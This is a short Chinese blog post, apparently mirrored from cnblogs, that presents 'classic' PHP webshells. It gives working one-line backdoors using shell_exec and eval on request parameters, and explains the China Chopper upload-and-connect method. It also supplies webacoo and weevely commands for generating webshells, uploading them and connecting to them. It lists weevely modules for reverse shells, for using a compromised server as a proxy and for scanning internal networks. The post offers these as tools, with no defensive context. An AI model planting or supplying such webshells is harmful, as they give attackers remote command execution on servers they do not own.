zoukankan      html  css  js  c++  java
  • 几种好用的经典webshell(php)

    php经典一句话: <?php echo shell_exec($_GET['cmd']);?>


    中国菜刀:
    官网:www.maicaidao.co
    原理:上传一句话(<?php @eval($_POST['我是密码']);?>)至服务器端,再用中国菜刀客户端(图形化界面)去连接服务器

    webacoo(kali):
    特点:传输的数据包裹在cookie中,并非http包体内,起到一定绕过作用
    原理:生成webshell,上传至目标服务器,再拿webacoo去连接该webshell,返回可以执行系统命令的shell
    缺点:不可设置专属连接密码
    生成webshell: webacoo -g -o a.php
    连接webshell: webacoo -t -u http://192.168.1.1/a.php

    weevely(kali):
    原理:生成webshell,上传至目标服务器,再拿weevely去连接该webshell,返回可以执行系统命令的shell
    生成webshell:weevely generate 密码 a.php
    连接webshell:weevely http://192.168.1.1/a.php 密码
    特点:连接到目标服务器webshell后还可以调用内置的N多模块,在shell下输入help查看模块,直接在shell下输入模块名称使用模块

    30多个管理模块举例:
    1、执行系统命令、浏览文件系统
    2、检查服务器常见配置错误
    3、创建正向、反向TCP Shell连接
    4、将目标服务器作为代理http服务器(肉鸡) ====>只需要在连接到的shell中输入net_proxy即可打开代理,此时会在本地监听127.0.0.1:8080,浏览器设置为该代理后所有流量将走目标服务器
    5、从目标计算机运行端口扫描,渗透内网

  • 相关阅读:
    线段树再练习
    SCOI 2014 省选总结
    网络流拓展——最小费用最大流
    【集合!】 20140416 && 20140417集训 总结
    Codeforces Round #215 (Div. 1)
    CDQ分治题目小结
    Codeforces Round #232 (Div. 1)
    Codeforces Round #264 (Div. 2)
    Uva 12361 File Retrieval 后缀数组+并查集
    FFT初步学习小结
  • 原文地址:https://www.cnblogs.com/baihualin/p/10348539.html
Copyright © 2011-2022 走看看